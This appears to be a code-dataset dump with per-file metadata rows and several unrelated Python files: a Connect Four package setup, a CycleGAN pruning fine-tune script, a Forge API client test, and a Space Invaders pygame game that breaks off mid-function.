version='0.6.1',
author='Wok',
author_email='wok@tuta.io',
description='Artificial Intelligence for the game Connect Four on PyPI',
keywords=['puissance4', 'puissance-4', 'connect4', 'connect-4', 'connect-four', 'artificial intelligence', 'UCT'],
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/woctezuma/puissance4',
download_url='https://github.com/woctezuma/puissance4/archive/0.6.1.tar.gz',
packages=setuptools.find_packages(),
install_requires=[
],
test_suite='nose.collector',
tests_require=['nose'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Topic :: Games/Entertainment',
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
'Intended Audience :: End Users/Desktop',
'Natural Language :: French',
],
python_requires='>=3',
)
| 34.242424 | 118 | 0.656637 | 125 | 1,130 | 5.832 | 0.712 | 0.082305 | 0.00823 | 0.082305 | 0.098765 | 0.098765 | 0 | 0 | 0 | 0 | 0 | 0.017486 | 0.190265 | 1,130 | 32 | 119 | 35.3125 | 0.779235 | 0 | 0 | 0.066667 | 0 | 0.033333 | 0.484071 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.033333 | 0 | 0.033333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2abf30e4b7b9b1f3639d619209a87cba5e30d20 | 12,691 | py | Python | finetune.py | pawopawo/GAN-pruning | d3cb25d127e082c3304971ed4ae74b6e6dcb3adb | [
"BSD-3-Clause"
] | 1 | 2020-07-02T16:16:48.000Z | 2020-07-02T16:16:48.000Z | finetune.py | pawopawo/GAN-pruning | d3cb25d127e082c3304971ed4ae74b6e6dcb3adb | [
"BSD-3-Clause"
] | null | null | null | finetune.py | pawopawo/GAN-pruning | d3cb25d127e082c3304971ed4ae74b6e6dcb3adb | [
"BSD-3-Clause"
] | null | null | null | import argparse
import itertools
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
from torch.autograd import Variable
from PIL import Image
import torch
import torch.nn as nn
import numpy as np
from models import Generator
from models import Discriminator
from models_prune import Generator_Prune
from models_prune import compute_layer_mask
from utils import ReplayBuffer
from utils import LambdaLR
from utils import weights_init_normal
from datasets import ImageDataset
import numpy as np
#copy data and pretrained model to finetuning environment
import moxing as mox
mox.file.copy_parallel("s3://data/horse2zebra","/cache/data/horse2zebra")
mox.file.copy_parallel("s3://models/CycleGAN/horse2zebra/output","/cache/log/output")
mox.file.copy_parallel("s3://models/GA/txt","/cache/GA/txt")
parser = argparse.ArgumentParser()
parser.add_argument('--data_url', type=str, default='', help='root directory of the dataset')
parser.add_argument('--train_url', type=str, default='', help='root directory of the dataset')
parser.add_argument('--num_gpus', type=int, default=8, help='num_gpu')
parser.add_argument('--init_method', type=str, default='', help='init method')
parser.add_argument('--epoch', type=int, default=0, help='starting epoch')
parser.add_argument('--n_epochs', type=int, default=201, help='number of epochs of training')
parser.add_argument('--batchSize', type=int, default=8, help='size of the batches')
parser.add_argument('--dataroot', type=str, default='/cache/data/horse2zebra', help='root directory of the dataset')
parser.add_argument('--lr', type=float, default=0.0002, help='initial learning rate')
parser.add_argument('--decay_epoch', type=int, default=100, help='epoch to start linearly decaying the learning rate to 0')
parser.add_argument('--size', type=int, default=256, help='size of the data crop (squared assumed)')
parser.add_argument('--input_nc', type=int, default=3, help='number of channels of input data')
parser.add_argument('--output_nc', type=int, default=3, help='number of channels of output data')
parser.add_argument('--cuda', type=bool, default =True, help='use GPU computation')
parser.add_argument('--n_cpu', type=int, default=8, help='number of cpu threads to use during batch generation')
opt = parser.parse_args()
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
#construct mask
first_conv_out=64
mask_chns=[]
mask_chns.append(first_conv_out) #1st conv
mask_chns.append(first_conv_out*2) #2nd conv
mask_chns.append(first_conv_out*4) #3rd conv 1~9 res_block
mask_chns.append(first_conv_out*2) #1st trans_conv
mask_chns.append(first_conv_out) #2nd trans_conv
bit_len=0
for mask_chn in mask_chns:
bit_len+= mask_chn
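# Total mask length: 64 + 128 + 256 + 128 + 64 = 640 bits, one bit per
# prunable output channel across the generator stages enumerated above.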
def train_from_mask():
#load best fitness binary masks
mask_input_A2B=np.loadtxt("/cache/GA/txt/best_fitness_A2B.txt")
mask_input_B2A=np.loadtxt("/cache/GA/txt/best_fitness_B2A.txt")
cfg_mask_A2B=compute_layer_mask(mask_input_A2B,mask_chns)
cfg_mask_B2A=compute_layer_mask(mask_input_B2A,mask_chns)
netG_B2A = Generator(opt.output_nc, opt.input_nc)
netG_A2B = Generator(opt.output_nc, opt.input_nc)
model_A2B = Generator_Prune(cfg_mask_A2B)
model_B2A = Generator_Prune(cfg_mask_B2A)
netD_A = Discriminator(opt.input_nc)
netD_B = Discriminator(opt.output_nc)
netG_A2B.load_state_dict(torch.load('/cache/log/output/netG_A2B.pth'))
netG_B2A.load_state_dict(torch.load('/cache/log/output/netG_B2A.pth'))
netD_A.load_state_dict(torch.load('/cache/log/output/netD_A.pth'))
netD_B.load_state_dict(torch.load('/cache/log/output/netD_B.pth'))
# Lossess
criterion_GAN = torch.nn.MSELoss()
criterion_cycle = torch.nn.L1Loss()
criterion_identity = torch.nn.L1Loss()
layer_id_in_cfg=0
start_mask=torch.ones(3)
end_mask=cfg_mask_A2B[layer_id_in_cfg]
for [m0, m1] in zip(netG_A2B.modules(), model_A2B.modules()):
if isinstance(m0, nn.Conv2d):
idx0 = np.squeeze(np.argwhere(np.asarray(start_mask)))
idx1 = np.squeeze(np.argwhere(np.asarray(end_mask)))
print('In shape: {:d}, Out shape {:d}.'.format(idx0.size, idx1.size))
w1 = m0.weight.data[:, idx0.tolist(), :, :].clone()
w1 = w1[idx1.tolist(), :, :, :].clone()
m1.weight.data = w1.clone()
m1.bias.data =m0.bias.data[idx1.tolist()].clone()
layer_id_in_cfg += 1
start_mask = end_mask
if layer_id_in_cfg < len(cfg_mask_A2B): # stop once every layer mask has been consumed
end_mask = cfg_mask_A2B[layer_id_in_cfg]
print(layer_id_in_cfg)
elif isinstance(m0, nn.ConvTranspose2d):
print('Into ConvTranspose...')
idx0 = np.squeeze(np.argwhere(np.asarray(start_mask)))
idx1 = np.squeeze(np.argwhere(np.asarray(end_mask)))
print('In shape: {:d}, Out shape {:d}.'.format(idx0.size, idx1.size))
w1 = m0.weight.data[idx0.tolist(),:, :, :].clone()
w1 = w1[:,idx1.tolist(), :, :].clone()
m1.weight.data = w1.clone()
m1.bias.data =m0.bias.data[idx1.tolist()].clone()
layer_id_in_cfg += 1
start_mask = end_mask
if layer_id_in_cfg < len(cfg_mask_A2B):
end_mask = cfg_mask_A2B[layer_id_in_cfg]
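# Indexing note for the loop above: nn.Conv2d stores weights as
# (out_ch, in_ch, kH, kW) while nn.ConvTranspose2d stores them as
# (in_ch, out_ch, kH, kW), which is why the idx0/idx1 selection order is
# swapped between the two branches.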
layer_id_in_cfg=0
start_mask=torch.ones(3)
end_mask=cfg_mask_B2A[layer_id_in_cfg]
for [m0, m1] in zip(netG_B2A.modules(), model_B2A.modules()):
if isinstance(m0, nn.Conv2d):
idx0 = np.squeeze(np.argwhere(np.asarray(start_mask)))
idx1 = np.squeeze(np.argwhere(np.asarray(end_mask)))
print('In shape: {:d}, Out shape {:d}.'.format(idx0.size, idx1.size))
w1 = m0.weight.data[:, idx0.tolist(), :, :].clone()
w1 = w1[idx1.tolist(), :, :, :].clone()
m1.weight.data = w1.clone()
m1.bias.data =m0.bias.data[idx1.tolist()].clone()
layer_id_in_cfg += 1
start_mask = end_mask
if layer_id_in_cfg < len(cfg_mask_B2A):
end_mask = cfg_mask_B2A[layer_id_in_cfg]
print(layer_id_in_cfg)
elif isinstance(m0, nn.ConvTranspose2d):
print('Into ConvTranspose...')
idx0 = np.squeeze(np.argwhere(np.asarray(start_mask)))
idx1 = np.squeeze(np.argwhere(np.asarray(end_mask)))
print('In shape: {:d}, Out shape {:d}.'.format(idx0.size, idx1.size))
w1 = m0.weight.data[idx0.tolist(),:, :, :].clone()
w1 = w1[:,idx1.tolist(), :, :].clone()
m1.weight.data = w1.clone()
m1.bias.data =m0.bias.data[idx1.tolist()].clone()
layer_id_in_cfg += 1
start_mask = end_mask
if layer_id_in_cfg < len(cfg_mask_B2A):
end_mask = cfg_mask_B2A[layer_id_in_cfg]
# Dataset loader
netD_A=torch.nn.DataParallel(netD_A).cuda()
netD_B=torch.nn.DataParallel(netD_B).cuda()
model_A2B=torch.nn.DataParallel(model_A2B).cuda()
model_B2A=torch.nn.DataParallel(model_B2A).cuda()
Tensor = torch.cuda.FloatTensor if opt.cuda else torch.Tensor
input_A = Tensor(opt.batchSize, opt.input_nc, opt.size, opt.size)
input_B = Tensor(opt.batchSize, opt.output_nc, opt.size, opt.size)
target_real = Variable(Tensor(opt.batchSize).fill_(1.0), requires_grad=False)
target_fake = Variable(Tensor(opt.batchSize).fill_(0.0), requires_grad=False)
fake_A_buffer = ReplayBuffer()
fake_B_buffer = ReplayBuffer()
lamda_loss_ID=5.0
lamda_loss_G=1.0
lamda_loss_cycle=10.0
optimizer_G = torch.optim.Adam(itertools.chain(model_A2B.parameters(), model_B2A.parameters()),
lr=opt.lr, betas=(0.5, 0.999))
optimizer_D_A = torch.optim.Adam(netD_A.parameters(), lr=opt.lr, betas=(0.5, 0.999))
optimizer_D_B = torch.optim.Adam(netD_B.parameters(), lr=opt.lr, betas=(0.5, 0.999))
lr_scheduler_G = torch.optim.lr_scheduler.LambdaLR(optimizer_G, lr_lambda=LambdaLR(opt.n_epochs, opt.epoch, opt.decay_epoch).step)
lr_scheduler_D_A = torch.optim.lr_scheduler.LambdaLR(optimizer_D_A, lr_lambda=LambdaLR(opt.n_epochs, opt.epoch, opt.decay_epoch).step)
lr_scheduler_D_B = torch.optim.lr_scheduler.LambdaLR(optimizer_D_B, lr_lambda=LambdaLR(opt.n_epochs, opt.epoch, opt.decay_epoch).step)
transforms_ = [
transforms.Resize(int(opt.size*1.12), Image.BICUBIC),
transforms.RandomCrop(opt.size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)) ]
dataloader = DataLoader(ImageDataset(opt.dataroot, transforms_=transforms_, unaligned=True,mode='train'), batch_size=opt.batchSize, shuffle=True,drop_last=True)
for epoch in range(opt.epoch, opt.n_epochs):
for i, batch in enumerate(dataloader):
# Set model input
real_A = Variable(input_A.copy_(batch['A']))
real_B = Variable(input_B.copy_(batch['B']))
###### Generators A2B and B2A ######
optimizer_G.zero_grad()
# Identity loss
# G_A2B(B) should equal B if real B is fed
same_B = model_A2B(real_B)
loss_identity_B = criterion_identity(same_B, real_B)*lamda_loss_ID #initial 5.0
# G_B2A(A) should equal A if real A is fed
same_A = model_B2A(real_A)
loss_identity_A = criterion_identity(same_A, real_A)*lamda_loss_ID #initial 5.0
# GAN loss
fake_B = model_A2B(real_A)
pred_fake = netD_B(fake_B)
loss_GAN_A2B = criterion_GAN(pred_fake, target_real)*lamda_loss_G #initial 1.0
fake_A = model_B2A(real_B)
pred_fake = netD_A(fake_A)
loss_GAN_B2A = criterion_GAN(pred_fake, target_real)*lamda_loss_G #initial 1.0
# Cycle loss
recovered_A = model_B2A(fake_B)
loss_cycle_ABA = criterion_cycle(recovered_A, real_A)*lamda_loss_cycle #initial 10.0
recovered_B = model_A2B(fake_A)
loss_cycle_BAB = criterion_cycle(recovered_B, real_B)*lamda_loss_cycle #initial 10.0
# Total loss
loss_G = loss_identity_A + loss_identity_B + loss_GAN_A2B + loss_GAN_B2A + loss_cycle_ABA + loss_cycle_BAB
loss_G.backward()
optimizer_G.step()
###### Discriminator A ######
optimizer_D_A.zero_grad()
# Real loss
pred_real = netD_A(real_A)
loss_D_real = criterion_GAN(pred_real, target_real)
# Fake loss
fake_A = fake_A_buffer.push_and_pop(fake_A)
pred_fake = netD_A(fake_A.detach())
loss_D_fake = criterion_GAN(pred_fake, target_fake)
# Total loss
loss_D_A = (loss_D_real + loss_D_fake)*0.5
loss_D_A.backward()
optimizer_D_A.step()
###################################
###### Discriminator B ######
optimizer_D_B.zero_grad()
# Real loss
pred_real = netD_B(real_B)
loss_D_real = criterion_GAN(pred_real, target_real)
# Fake loss
fake_B = fake_B_buffer.push_and_pop(fake_B)
pred_fake = netD_B(fake_B.detach())
loss_D_fake = criterion_GAN(pred_fake, target_fake)
# Total loss
loss_D_B = (loss_D_real + loss_D_fake)*0.5
loss_D_B.backward()
optimizer_D_B.step()
print("epoch:%d Loss G:%4f LossID_A:%4f LossID_B:%4f Loss_G_A2B:%4f Loss_G_B2A:%4f Loss_Cycle_ABA:%4f Loss_Cycle_BAB:%4f "%(epoch,loss_G,loss_identity_A, loss_identity_B, loss_GAN_A2B, loss_GAN_B2A, loss_cycle_ABA, loss_cycle_BAB))
# Update learning rates
lr_scheduler_G.step()
lr_scheduler_D_A.step()
lr_scheduler_D_B.step()
if epoch%20==0:
# Save models checkpoints
torch.save(model_A2B.module.state_dict(), '/cache/log/output/A2B_%d.pth'%(epoch))
torch.save(model_B2A.module.state_dict(), '/cache/log/output/B2A_%d.pth'%(epoch))
###################################
if __name__ == "__main__":
train_from_mask()
| 39.169753 | 245 | 0.639902 | 1,823 | 12,691 | 4.179375 | 0.150302 | 0.016538 | 0.021263 | 0.02835 | 0.505184 | 0.463184 | 0.419084 | 0.370259 | 0.370259 | 0.332721 | 0 | 0.026165 | 0.232054 | 12,691 | 324 | 246 | 39.169753 | 0.755592 | 0.046805 | 0 | 0.330097 | 0 | 0.004854 | 0.110535 | 0.02893 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004854 | false | 0 | 0.092233 | 0 | 0.097087 | 0.048544 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2ac384bcee15e4f087beaa4add6c2d785179245 | 505 | py | Python | test.py | dmh126/forge-python-data-management-api | 9c33f220021251a0340346065e3dd1998fc49a12 | [
"MIT"
] | 1 | 2019-07-02T08:32:22.000Z | 2019-07-02T08:32:22.000Z | test.py | dmh126/forge-python-data-management-api | 9c33f220021251a0340346065e3dd1998fc49a12 | [
"MIT"
] | null | null | null | test.py | dmh126/forge-python-data-management-api | 9c33f220021251a0340346065e3dd1998fc49a12 | [
"MIT"
] | 2 | 2019-07-04T05:13:42.000Z | 2020-05-09T22:15:05.000Z | import os
import unittest
from forge_api_client import ApiClient
class Tests(unittest.TestCase):
def setUp(self):
self.client_id = os.environ["FORGE_CLIENT_ID"]
self.client_secret = os.environ["FORGE_CLIENT_SECRET"]
def test_buckets(self):
fac = ApiClient()
fac.authClientTwoLegged(self.client_id, self.client_secret, scope="bucket:read")
buckets = fac.getBuckets()
self.assertIn("items", buckets)
if __name__ == '__main__':
unittest.main()
| 26.578947 | 88 | 0.691089 | 62 | 505 | 5.322581 | 0.483871 | 0.121212 | 0.072727 | 0.121212 | 0.145455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.19802 | 505 | 18 | 89 | 28.055556 | 0.814815 | 0 | 0 | 0 | 0 | 0 | 0.114851 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2ac5dd79237ed4091ea9c293d63cecb486e627a | 22,039 | py | Python | spaceinvaders.py | hi-hi-ray/space-invaders | 8df3bc2b8bf2093d26486dfd17f9acc2caaa0ceb | [
"MIT"
] | 2 | 2018-09-26T14:33:00.000Z | 2019-10-10T21:53:04.000Z | spaceinvaders.py | hi-hi-ray/space-invaders | 8df3bc2b8bf2093d26486dfd17f9acc2caaa0ceb | [
"MIT"
] | null | null | null | spaceinvaders.py | hi-hi-ray/space-invaders | 8df3bc2b8bf2093d26486dfd17f9acc2caaa0ceb | [
"MIT"
] | null | null | null | # Space Invaders
# Created by Lee Robinson
# Adapted by Raysa Dutra
# !/usr/bin/env python
from pygame import *
import pygame.draw
from nave import Ship
from tiro import Bullet
from inimigo import Enemy
from barreira import Blocker
from ufo import Mystery
from explosao import Explosion
from vida import Life
from texto import Text
import sys
from random import shuffle, choice
import numpy as np
import peewee
from pontos_orm import ScoreOrm
from estados_orm import StateOrm
from estados import State
from pontos import Score
# RGB Constants
WHITE = (255, 255, 255)
GREEN = (153, 255, 187)
YELLOW = (241, 255, 0)
BLUE = (80, 255, 239)
PURPLE = (203, 0, 255)
RED = (237, 28, 36)
SCREEN = display.set_mode((800, 600))
FONT = "fonts/space_invaders.ttf"
IMG_NAMES = ["ship", "ship", "mystery", "enemy1_1", "enemy1_2", "enemy2_1", "enemy2_2",
"enemy3_1", "enemy3_2", "explosionblue", "explosiongreen", "explosionpurple", "laser", "enemylaser"]
IMAGE = {name: image.load("images/{}.png".format(name)).convert_alpha() for name in IMG_NAMES}
class SpaceInvaders(object):
def __init__(self):
mixer.pre_init(44100, -16, 1, 512)
init()
self.caption = display.set_caption('Space Invaders')
self.screen = SCREEN
self.background = image.load('images/background.jpg').convert()
self.startGame = False
self.mainScreen = True
self.gameOver = False
self.scoreBoard = False
# Initial value for a new game
self.enemyPositionDefault = 65
# Counter for enemy starting position (increased each new round)
self.enemyPositionStart = self.enemyPositionDefault
# Current enemy starting position
self.enemyPosition = self.enemyPositionStart
def reset(self, score, lives, newGame=False):
self.player = Ship(IMAGE, game)
self.playerGroup = sprite.Group(self.player)
self.explosionsGroup = sprite.Group()
self.bullets = sprite.Group()
self.mysteryShip = Mystery(IMAGE, game)
self.mysteryGroup = sprite.Group(self.mysteryShip)
self.enemyBullets = sprite.Group()
self.reset_lives(lives)
self.enemyPosition = self.enemyPositionStart
self.make_enemies()
# Only create blockers on a new game, not a new round
if newGame:
self.allBlockers = sprite.Group(self.make_blockers(0), self.make_blockers(1), self.make_blockers(2),
self.make_blockers(3))
self.keys = key.get_pressed()
self.clock = time.Clock()
self.timer = time.get_ticks()
self.noteTimer = time.get_ticks()
self.shipTimer = time.get_ticks()
self.score = score
self.lives = lives
self.create_audio()
self.create_text()
self.killedRow = -1
self.killedColumn = -1
self.makeNewShip = False
self.shipAlive = True
self.killedArray = [[0] * 10 for x in range(5)]
def make_blockers(self, number):
blockerGroup = sprite.Group()
for row in range(4):
for column in range(9):
blocker = Blocker(10, GREEN, row, column, game)
blocker.rect.x = 50 + (200 * number) + (column * blocker.width)
blocker.rect.y = 450 + (row * blocker.height)
blockerGroup.add(blocker)
return blockerGroup
def reset_lives_sprites(self):
self.life1 = Life(657, 3, IMAGE, game)
self.life2 = Life(685, 3, IMAGE, game)
self.life3 = Life(713, 3, IMAGE, game)
self.life4 = Life(741, 3, IMAGE, game)
self.life5 = Life(769, 3, IMAGE, game)
if self.lives == 5:
self.livesGroup = sprite.Group(self.life1, self.life2, self.life3, self.life4, self.life5)
elif self.lives == 4:
self.livesGroup = sprite.Group(self.life1, self.life2, self.life3, self.life4)
elif self.lives == 3:
self.livesGroup = sprite.Group(self.life1, self.life2, self.life3)
elif self.lives == 2:
self.livesGroup = sprite.Group(self.life1, self.life2)
elif self.lives == 1:
self.livesGroup = sprite.Group(self.life1)
def reset_lives(self, lives):
self.lives = lives
self.reset_lives_sprites()
def create_audio(self):
self.sounds = {}
for sound_name in ["shoot", "shoot2", "invaderkilled", "mysterykilled", "shipexplosion"]:
self.sounds[sound_name] = mixer.Sound("sounds/{}.wav".format(sound_name))
self.sounds[sound_name].set_volume(0.2)
self.musicNotes = [mixer.Sound("sounds/{}.wav".format(i)) for i in range(4)]
for sound in self.musicNotes:
sound.set_volume(0.5)
self.noteIndex = 0
def play_main_music(self, currentTime):
moveTime = self.enemies.sprites()[0].moveTime
if currentTime - self.noteTimer > moveTime:
self.note = self.musicNotes[self.noteIndex]
if self.noteIndex < 3:
self.noteIndex += 1
else:
self.noteIndex = 0
self.note.play()
self.noteTimer += moveTime
def background_stars(self, game):
# The background stars:
# Set the position:
self.stars_x = np.random.rand(5) * 800
self.stars_y = np.random.rand(5) * 600
# Set the velocity:
self.stars_v = np.zeros(5)
for i in np.arange(5):
self.stars_v[i] = int(0.5 + np.random.uniform() * 0.1)
game.stars_y = (game.stars_y + game.stars_v * 0.2) % 600
for i in range(5):
game.stars_x[i] = game.stars_x[i] if not game.stars_v[i] else \
game.stars_x[i] + 0.1 * int((np.random.rand() - 0.5) * 2.1)
pygame.draw.aaline(game.screen, WHITE,
(int(game.stars_x[i]), int(game.stars_y[i])),
(int(game.stars_x[i]), int(game.stars_y[i])))
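# Note on the starfield above: positions and velocities are re-randomized on
# every call, and int(0.5 + uniform() * 0.1) always truncates to 0, so the
# drift update has no visible effect; initializing once (e.g. in __init__)
# would give persistent, smoothly moving stars.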
def create_text(self):
self.titleText = Text(FONT, 50, "Space Invaders", WHITE, 164, 155)
self.titleText2 = Text(FONT, 25, "Press any key to continue ...", WHITE, 201, 225)
self.gameOverText = Text(FONT, 50, "Game Over! ", WHITE, 250, 270)
self.nextRoundText = Text(FONT, 50, "Next Round! ", WHITE, 240, 270)
self.enemy1Text = Text(FONT, 25, " = 10 pts", GREEN, 368, 270)
self.enemy2Text = Text(FONT, 25, " = 20 pts", BLUE, 368, 320)
self.enemy3Text = Text(FONT, 25, " = 30 pts", PURPLE, 368, 370)
self.enemy4Text = Text(FONT, 25, " = ?????", RED, 368, 420)
self.scoreText = Text(FONT, 20, "Score:", WHITE, 4, 5)
self.livesText = Text(FONT, 20, "Lives: ", WHITE, 580, 5)
self.leaderboardText = Text(FONT, 50, "Scoreboard: ", WHITE, 150, 100)
def check_input(self):
self.keys = key.get_pressed()
for e in event.get():
if e.type == QUIT:
sys.exit()
if e.type == KEYDOWN:
if e.key == K_SPACE:
if len(self.bullets) == 0 and self.shipAlive:
if self.score < 1000:
bullet = Bullet(self.player.rect.x + 23, self.player.rect.y + 5, -1, 15, "laser", "center",
game, IMAGE)
self.bullets.add(bullet)
self.allSprites.add(self.bullets)
self.sounds["shoot"].play()
else:
leftbullet = Bullet(self.player.rect.x + 8, self.player.rect.y + 5, -1, 15, "laser", "left",
game, IMAGE)
rightbullet = Bullet(self.player.rect.x + 38, self.player.rect.y + 5, -1, 15, "laser",
"right", game, IMAGE)
self.bullets.add(leftbullet)
self.bullets.add(rightbullet)
self.allSprites.add(self.bullets)
self.sounds["shoot2"].play()
def make_enemies(self):
enemies = sprite.Group()
for row in range(5):
for column in range(10):
enemy = Enemy(row, column, IMAGE, game)
enemy.rect.x = 157 + (column * 50)
enemy.rect.y = self.enemyPosition + (row * 45)
enemies.add(enemy)
self.enemies = enemies
self.allSprites = sprite.Group(self.player, self.enemies, self.livesGroup, self.mysteryShip)
def make_enemies_shoot(self):
columnList = []
for enemy in self.enemies:
columnList.append(enemy.column)
columnSet = set(columnList)
columnList = list(columnSet)
shuffle(columnList)
column = columnList[0]
enemyList = []
rowList = []
for enemy in self.enemies:
if enemy.column == column:
rowList.append(enemy.row)
row = max(rowList)
for enemy in self.enemies:
if enemy.column == column and enemy.row == row:
if (time.get_ticks() - self.timer) > 700:
self.enemyBullets.add(
Bullet(enemy.rect.x + 14, enemy.rect.y + 20, 1, 5, "enemylaser", "center", game, IMAGE))
self.allSprites.add(self.enemyBullets)
self.timer = time.get_ticks()
def calculate_score(self, row):
scores = {0: 30,
1: 20,
2: 20,
3: 10,
4: 10,
5: choice([50, 100, 150, 300])
}
score = scores[row]
self.score += score
return score
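# Mapping above: rows 0 to 4 are the regular invader rows (top row worth the
# most), and row 5, presumably the mystery ship's row given the random bonus,
# matches the "?????" entry drawn on the menu screen.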
def create_main_menu(self):
self.enemy1 = IMAGE["enemy3_1"]
self.enemy1 = transform.scale(self.enemy1, (40, 40))
self.enemy2 = IMAGE["enemy2_2"]
self.enemy2 = transform.scale(self.enemy2, (40, 40))
self.enemy3 = IMAGE["enemy1_2"]
self.enemy3 = transform.scale(self.enemy3, (40, 40))
self.enemy4 = IMAGE["mystery"]
self.enemy4 = transform.scale(self.enemy4, (80, 40))
self.screen.blit(self.enemy1, (318, 270))
self.screen.blit(self.enemy2, (318, 320))
self.screen.blit(self.enemy3, (318, 370))
self.screen.blit(self.enemy4, (299, 420))
for e in event.get():
if e.type == QUIT:
sys.exit()
if e.type == KEYUP:
self.startGame = True
self.mainScreen = False
def update_enemy_speed(self):
if len(self.enemies) <= 10:
for enemy in self.enemies:
enemy.moveTime = 400
if len(self.enemies) == 5:
for enemy in self.enemies:
enemy.moveTime = 200
def check_collisions(self):
collidedict = sprite.groupcollide(self.bullets, self.enemyBullets, True, False)
if collidedict:
for value in collidedict.values():
for currentSprite in value:
self.enemyBullets.remove(currentSprite)
self.allSprites.remove(currentSprite)
enemiesdict = sprite.groupcollide(self.bullets, self.enemies, True, False)
if enemiesdict:
for value in enemiesdict.values():
for currentSprite in value:
self.sounds["invaderkilled"].play()
player_state = State()
player_state.save_state(self.player.rect.x, self.lives, "invader")
self.killedRow = currentSprite.row
self.killedColumn = currentSprite.column
score = self.calculate_score(currentSprite.row)
explosion = Explosion(currentSprite.rect.x, currentSprite.rect.y, currentSprite.row, False, False,
score, FONT, WHITE, IMAGE, game)
self.explosionsGroup.add(explosion)
self.allSprites.remove(currentSprite)
self.enemies.remove(currentSprite)
self.gameTimer = time.get_ticks()
break
mysterydict = sprite.groupcollide(self.bullets, self.mysteryGroup, True, True)
if mysterydict:
for value in mysterydict.values():
for currentSprite in value:
currentSprite.mysteryEntered.stop()
self.sounds["mysterykilled"].play()
player_state = State()
player_state.save_state(self.player.rect.x, self.lives, "mystery")
score = self.calculate_score(currentSprite.row)
explosion = Explosion(currentSprite.rect.x, currentSprite.rect.y, currentSprite.row, False, True,
score, FONT, WHITE, IMAGE, game)
self.explosionsGroup.add(explosion)
self.allSprites.remove(currentSprite)
self.mysteryGroup.remove(currentSprite)
newShip = Mystery(IMAGE, game)
self.allSprites.add(newShip)
self.mysteryGroup.add(newShip)
break
bulletsdict = sprite.groupcollide(self.enemyBullets, self.playerGroup, True, False)
if bulletsdict:
for value in bulletsdict.values():
for playerShip in value:
if self.lives == 5:
self.lives -= 1
self.livesGroup.remove(self.life5)
self.allSprites.remove(self.life5)
elif self.lives == 4:
self.lives -= 1
self.livesGroup.remove(self.life4)
self.allSprites.remove(self.life4)
elif self.lives == 3:
self.lives -= 1
self.livesGroup.remove(self.life3)
self.allSprites.remove(self.life3)
elif self.lives == 2:
self.lives -= 1
self.livesGroup.remove(self.life2)
self.allSprites.remove(self.life2)
elif self.lives == 1:
self.lives -= 1
self.livesGroup.remove(self.life1)
self.allSprites.remove(self.life1)
elif self.lives == 0:
self.gameOver = True
self.startGame = False
self.sounds["shipexplosion"].play()
explosion = Explosion(playerShip.rect.x, playerShip.rect.y, 0, True, False, 0,
FONT, WHITE, IMAGE, game)
self.explosionsGroup.add(explosion)
self.allSprites.remove(playerShip)
self.playerGroup.remove(playerShip)
self.makeNewShip = True
self.shipTimer = time.get_ticks()
self.shipAlive = False
if sprite.groupcollide(self.enemies, self.playerGroup, True, True):
self.gameOver = True
self.startGame = False
sprite.groupcollide(self.bullets, self.allBlockers, True, True)
sprite.groupcollide(self.enemyBullets, self.allBlockers, True, True)
sprite.groupcollide(self.enemies, self.allBlockers, False, True)
def create_new_ship(self, createShip, currentTime):
if createShip and (currentTime - self.shipTimer > 900):
self.player = Ship(IMAGE, game)
self.allSprites.add(self.player)
self.playerGroup.add(self.player)
self.makeNewShip = False
self.shipAlive = True
def create_game_over(self, current_time):
self.screen.blit(self.background, (0, 0))
self.background_stars(game)
if current_time - self.timer < 750:
self.gameOverText.draw(self.screen)
if current_time - self.timer > 750 and current_time - self.timer < 1500:
self.screen.blit(self.background, (0, 0))
if current_time - self.timer > 1500 and current_time - self.timer < 2250:
self.gameOverText.draw(self.screen)
if current_time - self.timer > 2250 and current_time - self.timer < 2750:
self.screen.blit(self.background, (0, 0))
if current_time - self.timer > 3000:
scoreboard = Score()
scoreboard.save_score(self.score)
self.startGame = False
self.gameOver = False
self.mainScreen = False
self.scoreBoard = True
for e in event.get():
if e.type == QUIT:
sys.exit()
def create_scoreboard(self, scores):
self.screen.blit(self.background, (0, 0))
self.background_stars(game)
self.scoreboardText = Text(FONT, 20, "1- " + str(scores[0]), WHITE, 235, 201)
self.scoreboardText2 = Text(FONT, 20, "2- " + str(scores[1]), WHITE, 235, 221)
self.scoreboardText3 = Text(FONT, 20, "3- " + str(scores[2]), WHITE, 235, 241)
self.scoreboardText4 = Text(FONT, 20, "4- " + str(scores[3]), WHITE, 235, 261)
self.scoreboardText5 = Text(FONT, 20, "5- " + str(scores[4]), WHITE, 235, 281)
self.scoreboardText6 = Text(FONT, 20, "6- " + str(scores[5]), WHITE, 435, 201)
self.scoreboardText7 = Text(FONT, 20, "7- " + str(scores[6]), WHITE, 435, 221)
self.scoreboardText8 = Text(FONT, 20, "8- " + str(scores[7]), WHITE, 435, 241)
self.scoreboardText9 = Text(FONT, 20, "9- " + str(scores[8]), WHITE, 435, 261)
